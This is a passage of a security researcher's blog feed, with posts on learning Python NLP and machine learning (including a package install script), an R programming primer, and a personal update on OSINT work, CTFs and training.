url="https://substackcdn.com/image/fetch/$s_!RoX6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RoX6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RoX6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 424w, https://substackcdn.com/image/fetch/$s_!RoX6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 848w, https://substackcdn.com/image/fetch/$s_!RoX6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!RoX6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RoX6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/f94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RoX6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 424w, https://substackcdn.com/image/fetch/$s_!RoX6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 848w, https://substackcdn.com/image/fetch/$s_!RoX6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!RoX6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff94d15df-f395-480a-b3a2-f0736172758b_800x515.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>After one week of research and trial and error, I have some more progress to publish/report. I started the week by installing the packages used in the books that I am reading. I wrote a simple shell script to install them all:</p><pre><code>#!/bin/bashapt-get update -y;apt-get upgrade -y;apt-get install python-pip python3-pip python-bs4 python3-bs4;apt install apt-transport-https software-properties-common;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys E298A3A825C0D65DFD57CBB651716619E084DAB9;sudo add-apt-repository 'deb <a href="https://cloud.r-project.org/bin/linux/ubuntu">https://cloud.r-project.org/bin/linux/ubuntu</a> bionic-cran35/';apt-get update -y;apt-get install r-base;apt install gdebi-core;wget  <a href="https://download1.rstudio.org/desktop/bionic/amd64/rstudio-1.2.5019-amd64.deb;">https://download1.rstudio.org/desktop/bionic/amd64/rstudio-1.2.5019-amd64.deb;</a>gdebi  rstudio-1.2.5019-amd64.deb;pip install -r requirements.txt;pip3 install -r requirements.txt;echo "Installation Complete!"</code></pre><p>The requirements.txt file is the actual Python packages to install. Here is that file:</p><pre><code>requestsjupyterlabnumpytensorflowscikit-learnnltkpandasmatplotlibrebs4</code></pre><p>Since the Machine Learning and Natural Language Processing books are longer with longer chapters, I am currently pacing myself to complete one section per week right now. This allows me to ingest more material across multiple disciplines while continuing to make progress with my book, write other blogs, and hold down my day job.</p><h3>Python Learning</h3><h4>Natural Language Processing</h4><p>Starting with the other NLP, Natural Language Processing, not Neuro-Linguistic Programming, I installed the Natural Language Toolkit (nltk). At first, I was running the commands from the book in the python3 interpreter; then, I decided to write some scripts and save them as files.</p><p>At the beginning of this book (<a href="https://smile.amazon.com/Natural-Language-Processing-Python-Analyzing/dp/0596516495/ref=sxts_sxwds-bia?crid=19HN1ANQUDRTV&amp;keywords=natural+language+processing+with+python&amp;pd_rd_i=0596516495&amp;pd_rd_r=f3ab2cae-d591-4af4-8194-36cfb5ef3ac3&amp;pd_rd_w=hsTkI&amp;pd_rd_wg=N7GYo&amp;pf_rd_p=1cb3f32a-ccfd-479b-8a13-b22f56c942c6&amp;pf_rd_r=D65M0Y8YB13SVH34CDM9&amp;psc=1&amp;qid=1576396710&amp;sprefix=natural+lang%2Caps%2C168">Natural Language Processing with Python</a>), I am spending a lot of time using the sample dataset from the nltk, which can be installed via:</p><pre><code>from nltk.book import *</code></pre><p>This provides nine different literary works to analyze. The book starts with basic math and arithmetic. Next is starting to analyze the words within the files (named text1-text9). We begin by creating a concordance, which is a list of specific words used in alphabetical order and number of occurrences. I can see where this will be important in later projects because of the context this provides. To get a concordance of a file:</p><pre><code>&lt;filename&gt;.concordance("&lt;word_searched_for")</code></pre><p>We can also do a similar search with the word <em>similar</em> instead of <em>concordance</em>. This will find words like the one searched for. I ran this with the word &#8220;gazed&#8221; and it showed me lines (with the context) containing the phrase &#8220;stared&#8221; and &#8220;discovered.&#8221;</p><p>Using <em>common_context,</em> we can see instances where the words share a similar context.</p><pre><code>&lt;filename&gt;.common_context(["&lt;word1&gt;", "&lt;word2&gt;"])</code></pre><p>Here is where things could get scary. The generate function. It will analyze the text input and create a passage of its own using ngrams. Imagine the possibilities for this if using it for disinformation, deception, or deep fakes.</p><p>Next, we work with the <em>len() </em>command to determine the length of our text. We then move to sorting using <em>sorted()</em> and counts of occurrences of words. We can accomplish this via:</p><pre><code>&lt;filename&gt;.count("&lt;word&gt;")</code></pre><p>Next, we get into lists: creating them, adding two lists together, and appending to them. We move into indexing lists via:</p><pre><code>&lt;filename&gt;.index("&lt;word&gt;") Indexes for the word &lt;word&gt;.&lt;filename&gt;[8675309:] Indexes all items in the list after 8675309 (note the list starts at 0).&lt;filename&gt;[:8675309] Indexes all items in the list before (not including) 8675309 .&lt;filename&gt;[867:5309] Indexes all items in the list from item 867 to 5308.&lt;filename&gt;[6] Item number 6 in the list.</code></pre><pre><code>Modifying Lists:&lt;list&gt;[6] = 'six' Will write 'six' as the 6th item in the list or replace the 6th item with 'six'</code></pre><p>Next up is variables then strings. We start working with Frequency Distribution (this could come in handy with password cracking BTW). This works through the frequency of the words, the length of the words, and a combination of the two. This is accomplished using the <em>FreqDist </em>package within nltk.</p><p>The next section has me working with Python logic and conditionals.</p><pre><code>&lt;      Less Than&lt;=     Less Than or Equal To==     Equal To!=     Not equal To&gt;      Greater Than&gt;=     Greater Than or Equal To</code></pre><p>Conditional patterns of use are:</p><pre><code>&lt;name&gt;.startswith(&lt;letter&gt;)&lt;name&gt;.endswith(&lt;letter&gt;)&lt;letter&gt; in &lt;name&gt;&lt;name&gt;.islower() Checks if all characters are lowercase &lt;name&gt;.isupper() Checks if all characters are uppercase&lt;name&gt;.isaplha() Checks if all characters are alphabetic&lt;name&gt;.isalnum() Checks if all characters are alphanumeric&lt;name&gt;.isdigit() Checks if all characters are digits (numbers)&lt;name&gt;.istitle() Checks if all characters are in Title Case (All initial capitals)</code></pre><p>Here is an example where I input a chapter of my upcoming book into the interpreter and looking for words ending in &#8220;ishing:&#8221;</p><pre><code>&gt;&gt;&gt; sorted([w for w in set(book) if w.endswith('ishing')])['Phishing', 'accomplishing', 'phishing', 'vishing']</code></pre><p>This could be useful in determining variations that people use on passwords.</p><h4>Machine Learning (with SciKit-Learn and Tensorflow)</h4><p>Much of the first chapter of the book (<a href="https://smile.amazon.com/Hands-Machine-Learning-Scikit-Learn-TensorFlow/dp/1491962291/ref=sr_1_3?crid=2C832UDPL7HVD&amp;keywords=hands+on+machine+learning+with+scikit+learn+and+tensorflow&amp;qid=1576396768&amp;s=books&amp;sprefix=hands+on+m%2Cstripbooks%2C167&amp;sr=1-3">Hands-On Machine Learning with Scikit-Learn and Tensorflow</a>) is indoctrination to how Machine Learning works. This takes us through supervised and unsupervised learning, data quality, underfitting vs overfitting, instance-based learning versus model-based learning, and batch versus online learning to name a few.</p><p>I didn&#8217;t really write any code or learn anything relevant to python in this chapter. To me, this was a solid refresher in what I learned while working on a graduate certificate. I was able to pick up where I left off with aspects of cluster analysis and regression, which was a relief in a sense.</p><h3>Conclusion</h3><p>Next week is a busy week. In addition to my day job, I will be on an <a href="https://www.itspmagazine.com/">ITSP Magazine</a> podcast on Monday and <a href="https://securityweekly.com/">Paul&#8217;s Security Weekly</a> on Thursday as part of a penetration testing panel. I hope to meet my self-imposed quotas, but we will see where I land. I will check back in next week.</p><p>AT&amp;T Cybersecurity (formerly AlienVault), published my <a href="https://cybersecurity.att.com/blogs/security-essentials/which-security-certification-is-for-you-if-any">Which Security Certification Is Right For You (if any)</a> this week. I have upcoming pieces about to be released by <a href="https://www.tripwire.com/state-of-security/">TripWire</a> and ITSP forthcoming, both of which have a Home Alone theme. Stay tuned for those. I will also be writing something for work, so watch out for that as well.</p>]]></content:encoded></item><item><title><![CDATA[Research Update: Week of December 15 — R Programming]]></title><description><![CDATA[An update as to my progress in learning R and Data Science.]]></description><link>https://tidbit.theosintion.com/p/research-update-week-of-december-15-r-programming-a44797d126c0</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/research-update-week-of-december-15-r-programming-a44797d126c0</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Fri, 13 Dec 2019 14:01:01 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!IU5A!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IU5A!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IU5A!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 424w, https://substackcdn.com/image/fetch/$s_!IU5A!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 848w, https://substackcdn.com/image/fetch/$s_!IU5A!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 1272w, https://substackcdn.com/image/fetch/$s_!IU5A!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IU5A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IU5A!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 424w, https://substackcdn.com/image/fetch/$s_!IU5A!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 848w, https://substackcdn.com/image/fetch/$s_!IU5A!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 1272w, https://substackcdn.com/image/fetch/$s_!IU5A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1ece7676-57c5-4f68-b371-4a62c164f16c_600x464.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>After one week of research and trial and error, I have some progress to publish/report. I started the week by getting back into the R Programming language. I am using a short book from Packt Publishing, <a href="https://smile.amazon.com/Social-Media-Mining-Nathan-Danneman/dp/1783281774/ref=sr_1_2?keywords=social+media+mining+with+r&amp;qid=1576182816&amp;sr=8-2">Social Media Mining with R</a> as a primer. I also have R for Dummies (2012 edition) and <a href="https://smile.amazon.com/Learning-Step-Step-Function-Analysis/dp/1449357105/ref=sr_1_5?keywords=r+for+dummies&amp;qid=1576182869&amp;sr=8-5">Learning R</a> (2013), but I am focusing on the small book as of now for three reasons: a) R is not the primary language I will be using; b) it is shorter and a relevant primer; and c) the other books are more recent.</p><p>The first two chapters (my self-imposed assignment for this book this week) start with leveling about data science, big data, and statistic analysis in the first chapter then the fundamentals of R in the second chapter. The fundamentals covered basic arithmetic, functions, vectors, variables, importing data, and basic use.</p><p>For example, to install packages in R, a simple command as such is issued:</p><pre><code>install.package("&lt;package_name&gt;", dependencies=True)</code></pre><p>This is similar to Python&#8217;s pip utility. To get pip, issue one (or both) of the commands below on a Debian or Ubuntu-based Linux host (based on which version of Python you are using):</p><pre><code>apt-get install python-pipapt-get install python3-pip</code></pre><p>Then to use <a href="https://pypi.org/project/pip/">pip</a> to install a package for Python from Python Package Index (PyPI), issue this command (showing both pip and pip3 for instances where people may be running Python2 and Python3):</p><pre><code>pip install &lt;package_name&gt;pip3 install &lt;package_name&gt;</code></pre><p>Back to R. Setting a working directory can save a lot of headaches.</p><pre><code>setwd("&lt;full/path/to/directory&gt;")</code></pre><p>So to set it to Joe&#8217;s Windows or Linux home directory, we would issue the following commands:</p><pre><code>Windows: setwd("C:\Users\Joe\R_Working_Directory")Linux: setwd("/home/Joe/R_Working_Directory")</code></pre><p>Let&#8217;s Load a sample CSV file from the computer.</p><pre><code>myfile &lt;- read.csv("path/to/file"</code></pre><p>If we wanted to load a file from the internet, substitute the path with the full URL (including http:// or <a href="https://%29.">https://).</a></p><p>Once we have the file loaded in R, we can analyze it.</p><p>Something notable about R:</p><pre><code>The = operator is not used to set variables. &lt;- is.</code></pre><pre><code>mydata = data is incorrect.mydata&lt;- data is the correct syntax in R. </code></pre><p>That&#8217;s it for what I have learned so far. Next week, I will be covering Mining Twitter with R and the pitfalls of social media.</p>]]></content:encoded></item><item><title><![CDATA[Update and New Forthcoming Research]]></title><description><![CDATA[It&#8217;s been a while since I published anything. I have been getting acclimated to my new position as a Senior OSINT Specialist at QOMPLX, as&#8230;]]></description><link>https://tidbit.theosintion.com/p/update-and-new-forthcoming-research-b8ebce20b974</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/update-and-new-forthcoming-research-b8ebce20b974</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Wed, 11 Dec 2019 20:56:23 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!sbbl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sbbl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sbbl!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 424w, https://substackcdn.com/image/fetch/$s_!sbbl!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 848w, https://substackcdn.com/image/fetch/$s_!sbbl!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!sbbl!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sbbl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/cf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sbbl!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 424w, https://substackcdn.com/image/fetch/$s_!sbbl!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 848w, https://substackcdn.com/image/fetch/$s_!sbbl!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!sbbl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf1561ac-d10d-442d-8d57-c299d34fa405_800x533.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>It&#8217;s been a while since I published anything. I have been getting acclimated to my new position as a Senior OSINT Specialist at <a href="https://www.qomplx.com/">QOMPLX</a>, as well as several other exciting things. I competed in the <a href="https://www.tracelabs.org/">Trace Labs</a> Missing Persons CTF at <a href="https://hackfest.ca/">HackFest</a> in Quebec City, Quebec(with Jos, MayGoogleForYou, and Isabella Ballerina as the Password Inspection Agency) and we got a close 2nd place, almost 1st. Still, we couldn&#8217;t hammer down a couple of details, but that is okay. I often say that this is the only CTF that matters. I also got 2nd place in the Social Engineering CTF, despite not speaking much French beyond <em>Parlez vous Anglais?.</em></p><p>Aside from traveling to Rhode Island in mid-December for a roundtable with <a href="https://securityweekly.com/">Paul&#8217;s Security Weekly</a>, I am done traveling for the year to speak. Thus far, I only have one confirmed engagement in 2020 &#8212; Teaching my <a href="https://www.eccouncil.org/">EC-Council</a> OSINT and Social Engineering Workshop at <a href="https://2020.appseccalifornia.org/">AppSec California</a> (January 21, 2020 &#8212; register <a href="https://www.eventbrite.com/e/appsec-california-2020-tickets-77058946383?aff=ebdssbdestsearch">here</a>). I will also be helping judge a Trace Labs Missing Persons CTF in December, remotely.</p><p>I am also about to resume <a href="https://hackthebox.eu/">Hack the Box</a> activity, so the walkthroughs will continue. I also plan on finishing <a href="https://www.offensive-security.com/pwk-oscp/">OSCP</a> before the end of May. I am currently doing some research in the Missing Persons space, both in the Trace Labs slack and independently, and I want to finish that research first.</p><h3>My Conundrum</h3><p>I feel like I have hit a brick wall when it comes to having material to talk about on a stage to my peers that are a) possibly taking time off work to hear the talk; and/or b) may have paid to attend the conference/presentation. To this end, I have decided to push myself outside my typical comfort zones of OSINT, Social Engineering, and Forensics. I have set off on a journey to learn more Python. Specifically, more Python as it relates to Machine Learning, Natural Language Processing (the <em>other</em> NLP), web scraping, and statistic analysis. I am coupling the R programming language into my research in statistic analysis.</p><p>To set the tone, I have some formal graduate-level education in Business Intelligence/Big Data/Applied Statistics. I am familiar with <strong><a href="https://en.wikipedia.org/wiki/Cross-industry_standard_process_for_data_mining">CRISP-DM</a> </strong>(Cross-Industry Standard Process for Data Mining) as well as the ethics, quantitative and qualitative methodologies (as well as mixed-method), sampling, and methods to minimize or eliminate bias in data sets.</p><p>While my day job has me working on some things relative to OSINT in this capacity, I want to push myself to learn and produce more. The purpose of this post is to share with you what I am working on in terms of learning and any open-source tools I create. I also hope to solicit ideas, advice, and feedback in what would be impactful to the community while also stimulating learning on my accord. To a degree, I am seeking ideas for 2020&#8217;s talks from the community.</p><h3>Ideas</h3><p>I have submitted one talk for 2020 thus far. Not because I don&#8217;t want to speak, although I am trying to slow down on the speaking and travel. I feel like I don&#8217;t have anything new or disruptive enough to hop on a stage in front of an audience and present. I want to do something with some OSINT or Social Engineering automation within reason. I would also like to expand on my <a href="https://www.slideshare.net/JoeGrayCISSPISSMP/decepticonv2?qid=f99470e0-897a-4b70-8696-65342ec5c8d0&amp;v=&amp;b=&amp;from_search=6">DECEPTICON</a> idea (disinformation and deception for OPSEC/Anti-OSINT). The lack of ideas is where I am drawing the most significant blank.</p><p>I am also considering getting my Private Investigator&#8217;s License.</p><h3>Research Method</h3><p>I am challenging myself to read between 1 and 3 chapters (depending on outside events, workload, and length/depth of the sections) of each of the following books (Note: the links will Donate to the <a href="https://ruraltechfund.org/">Rural Tech Fund</a> via Amazon Smile)</p><p><a href="https://smile.amazon.com/Mastering-Social-Media-Mining-Python">https://smile.amazon.com/Mastering-Social-Media-Mining-Python</a></p><p><a href="https://smile.amazon.com/Social-Media-Mining-Nathan-Danneman/dp/1783281774/">https://smile.amazon.com/Social-Media-Mining-Nathan-Danneman/dp/1783281774/</a></p><p><a href="https://smile.amazon.com/Mining-Social-Web-Facebook-Instagram/dp/1491985046">https://smile.amazon.com/Mining-Social-Web-Facebook-Instagram/dp/1491985046</a></p><p><a href="https://smile.amazon.com/Natural-Language-Processing-Python-Analyzing/dp/0596516495/">https://smile.amazon.com/Natural-Language-Processing-Python-Analyzing/dp/0596516495/</a></p><p><a href="https://smile.amazon.com/Hands-Machine-Learning-Scikit-Learn-TensorFlow/dp/1491962291/">https://smile.amazon.com/Hands-Machine-Learning-Scikit-Learn-TensorFlow/dp/1491962291/</a></p><p>As I progress through the books, I plan to marry ideas and create tooling, presentations, and other things of use. I may even create some training sessions on topics and aspects that I can master. I will share anything that I make public via Twitter and here.</p><h3>The Book</h3><p>The book, tentatively titled <em>Practical Social Engineering,</em> is coming along well. I have made it through the editorial process with almost eight chapters. I plan on having 14 plus appendices, so I am a little over halfway (less the technical review and edits there). I do not have a tentative release date yet, but working with <a href="https://nostarch.com/">NoStarch Press</a> has been a fantastic experience. Bill and his team (namely Frances) are nothing short of AMAZING!</p><h3>Training</h3><p>I have several training sessions planned. Check out the list <a href="https://www.theosintion.com/courses/schedule/">here</a>. Use coupon code <strong>BLACKFRIDAY </strong>for a <em><strong>50% </strong></em>discount (valid through December 31). Courses offered include (numerous sessions for each):</p><p>Regular Expressions (REGEX) for Offense, Defense, and OSINT</p><p>Introduction to People OSINT/Missing People OSINT</p><p>Basic OSINT (4-hour Version)</p><h3>Conclusion</h3><p>I hope you are doing well. I wish you a great holiday season (for whichever holiday(s) you may celebrate). Feel free to DM me (<a href="https://twitter.com/C_3PJoe">@C_3Pjoe on Twitter</a>) with any ideas you may have.</p>]]></content:encoded></item><item><title><![CDATA[DerbyCon Interview Series: Nicole Schwartz (Circuit Swan fka AmazonV)]]></title><description><![CDATA[I sat down with Nicole Schwartz to talk about her involvement and memories of DerbyCon.]]></description><link>https://tidbit.theosintion.com/p/derbycon-interview-series-nicole-schwartz-circuit-swan-fka-amazonv-4f158f7b0a27</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/derbycon-interview-series-nicole-schwartz-circuit-swan-fka-amazonv-4f158f7b0a27</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Sat, 14 Sep 2019 05:26:01 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!KfK0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link 